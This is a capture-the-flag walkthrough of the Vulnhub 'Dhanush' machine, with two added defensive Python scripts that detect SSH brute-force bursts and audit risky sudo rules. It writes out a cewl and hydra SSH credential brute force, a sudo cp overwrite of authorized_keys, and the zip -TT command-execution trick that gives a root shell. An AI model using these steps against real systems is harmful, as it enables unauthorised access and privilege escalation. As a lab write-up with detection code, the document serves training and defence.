
Vulnhub: Dhanush target machine walkthrough

Date: 2023-07-12 15:35:25

Dhanush

Identifying the target host IP address

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24 
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                  
                                                                                                                                                
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      2     120  VMware, Inc.                                                                                 
 192.168.187.155 00:0c:29:ab:6e:4f      2     120  VMware, Inc.                                                                                 
 192.168.187.254 00:50:56:e2:20:55      1      60  VMware, Inc.          

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan                                                                           130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
|   256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_  256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>
                          

The target has no robots.txt file.

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.155
+ Target Hostname:    192.168.187.155
+ Target Port:        80
+ Start Time:         2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto did not turn up anything of value.

Directory scanning yielded nothing either.

Build a wordlist from the site and see whether the SSH username and password can be brute-forced with it:

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood ([email protected]) (https://digi.ninja/)
                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt 
114 dict.txt
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345        

The brute force yields the credentials pinak/Gandiv.
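From the defender's side, a hydra run like the one above leaves a very recognisable trail in sshd's log: a burst of "Failed password" lines from one source address, often for several different usernames, sometimes followed by an "Accepted" line from the same host. The script below is an added example (not part of the original write-up) that parses OpenSSH auth.log lines in the format Ubuntu 18.04 writes and flags hosts that exceed a failure threshold within a time window. The log lines, addresses and usernames in SAMPLE_AUTH_LOG are constructed for the example; the threshold and window values are assumptions to tune per environment.

```python
"""Detect SSH password-guessing bursts in OpenSSH auth.log lines.

Added example (not from the original write-up). SAMPLE_AUTH_LOG is
constructed to resemble what sshd writes to /var/log/auth.log during a
wordlist attack; the IPs, usernames and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: five failures from one host within seconds (several
# usernames tried), then a successful login from that host, plus unrelated
# normal traffic from another host with a single typo'd password.
SAMPLE_AUTH_LOG = """\
Jul 12 02:50:01 ubuntu sshd[1201]: Failed password for invalid user dhanush from 192.168.187.130 port 40122 ssh2
Jul 12 02:50:01 ubuntu sshd[1202]: Failed password for invalid user arrow from 192.168.187.130 port 40124 ssh2
Jul 12 02:50:02 ubuntu sshd[1203]: Failed password for invalid user bow from 192.168.187.130 port 40126 ssh2
Jul 12 02:50:02 ubuntu sshd[1204]: Failed password for pinak from 192.168.187.130 port 40128 ssh2
Jul 12 02:50:03 ubuntu sshd[1205]: Failed password for pinak from 192.168.187.130 port 40130 ssh2
Jul 12 02:50:03 ubuntu sshd[1206]: Accepted password for pinak from 192.168.187.130 port 40132 ssh2
Jul 12 02:51:10 ubuntu sshd[1210]: Accepted publickey for sarang from 10.1.1.143 port 51000 ssh2: ED25519 SHA256:AAAA
Jul 12 02:55:00 ubuntu sshd[1211]: Failed password for sarang from 10.1.1.143 port 51002 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and
# "Accepted password/publickey for X from IP".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2023):
    """Return a dict for an sshd auth line, or None for anything else.
    syslog timestamps carry no year, so one is supplied (assumed 2023)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Map source IP -> finding for every host whose failed logins within
    any window_seconds span reach threshold. The finding records how many
    distinct usernames were tried and whether a login from that host
    succeeded after the burst started (the case that needs a response)."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        fails = sorted((e for e in evs if e["result"] == "Failed"), key=lambda e: e["ts"])
        # Sliding window over the failure timestamps.
        for i in range(len(fails)):
            j = i
            while (j + 1 < len(fails)
                   and (fails[j + 1]["ts"] - fails[i]["ts"]).total_seconds() <= window_seconds):
                j += 1
            if j - i + 1 >= threshold:
                burst_start = fails[i]["ts"]
                success_after = any(e["result"] == "Accepted" and e["ts"] >= burst_start
                                    for e in evs)
                findings[ip] = {
                    "failures": j - i + 1,
                    "usernames": sorted({e["user"] for e in fails[i:j + 1]}),
                    "success_after_burst": success_after,
                }
                break
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, f)
```

Run against the sample, only 192.168.187.130 is flagged (five failures across four usernames, with a successful password login right after), while the single failure from 10.1.1.143 stays below the threshold. The same burst is what fail2ban's sshd jail keys on; moving sshd to port 65345, as this machine does, hides nothing from this check because the log records the client's source port, not the listening port, and the real fix is disabling password authentication in sshd_config.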

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh [email protected] -p 65345              
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh

Privilege escalation

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ 

pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh [email protected] -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1

Following the hint in pinak's .bash_history, copy pinak's id_rsa.pub into sarang's authorized_keys; the matching private key can then be used to log in to sarang's shell.

sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Nov  8  2019 .
drwxr-xr-x 22 root root 4.0K Nov  8  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root 1.5K Nov  8  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
          
                                            @p
                                           @@@.
                                          @@@@@
                                         @@@@@@@
                                        *"`]@P ^^
                                           ]@P
                                           ]@P
                               ,,,,        ]@P       ,,gg,,
                           g@@@@@@@@@b     ]@P    ,@@@@@@@@@@g,
                        ,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
                      g@@@@P^`        %NNNNN@NNNNNP          *B@@@g
                    g@@@P`                 -@                   "B@@w
                  ,@@@`                    ]@                      %@@,
                 @@P-                      ]@                        *@@,
              ,@@"                         ]@                          *B@
            ,@N"                          y@@B                            %@,
      ,,  g@P-                            ]@@@P                             *Bg ,gg
      @@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma     : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|

That gives us the root flag and a root shell.
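Both escalation steps above rest on the same misconfiguration: a sudoers rule that grants a single "harmless" binary without a password. cp as sarang lets pinak overwrite any file sarang owns, authorized_keys included, and zip as root runs a command via its -TT test option. The script below is an added example (not from the original write-up) that parses the "User X may run the following commands" section exactly as sudo -l prints it and flags such rules. SAMPLE_SUDO_L is constructed to mirror the two rules in the walkthrough plus a benign one; RISKY_BINARIES is deliberately limited to the two binaries the walkthrough exercises, and a real audit would use a maintained list.

```python
"""Audit `sudo -l` output for rules that grant far more than they appear to.

Added example (not from the original write-up). It parses the command
section in the format sudo prints and flags entries whose binary lets the
caller write arbitrary files or run arbitrary commands as the run-as user.
"""
import re

# Why each binary is dangerous under sudo. Kept to the two cases the
# walkthrough demonstrates; extend from a maintained list for real use.
RISKY_BINARIES = {
    "cp": "can overwrite any file the run-as user owns (e.g. ~/.ssh/authorized_keys)",
    "zip": "its -T/-TT test option runs a command as the run-as user",
}

# "(runas) TAG: TAG: /path/cmd args, /other/cmd" -- tags are optional.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Constructed sample in sudo -l's layout: the walkthrough's zip and cp rules
# plus a benign, password-protected one.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
    (pinak) NOPASSWD: /bin/cp
    (root) /usr/bin/systemctl restart apache2
"""


def parse_sudo_l(text):
    """Return a list of {runas, tags, command} dicts, one per command,
    taken from the section after 'User X may run the following commands'."""
    rules = []
    in_cmds = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m["tags"].split()]
        # One rule may list several commands separated by commas.
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(), "tags": tags, "command": cmd.strip()})
    return rules


def audit_rules(rules):
    """Flag rules granting 'ALL' or a binary in RISKY_BINARIES. Rules that
    run as root (or ALL) are 'high'; rules that run as another user are
    'medium', since they still allow lateral movement to that account."""
    findings = []
    for r in rules:
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if r["command"] != "ALL" and binary not in RISKY_BINARIES:
            continue
        reason = "unrestricted command" if r["command"] == "ALL" else RISKY_BINARIES[binary]
        if "NOPASSWD" in r["tags"]:
            reason += "; no password required"
        # "(root : root)" style runas lists user then group; judge on the user.
        runas_user = r["runas"].split(":")[0].strip()
        severity = "high" if runas_user in ("root", "ALL") else "medium"
        findings.append({"command": r["command"], "runas": r["runas"],
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f['severity']}] ({f['runas']}) {f['command']}: {f['reason']}")
```

On the sample the zip rule is reported as high (root, no password) and the cp rule as medium (runs as another user, no password), while the systemctl rule passes. Feeding it the real output of sudo -l for each account, or the rules from /etc/sudoers and /etc/sudoers.d, gives a quick first pass over a host before an attacker does the same with GTFOBins.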

Lessons learned

  1. The key to this machine is generating a wordlist from the website and then using hydra to brute-force the SSH username and password with it.

From: https://www.cnblogs.com/jason-huawen/p/17547600.html
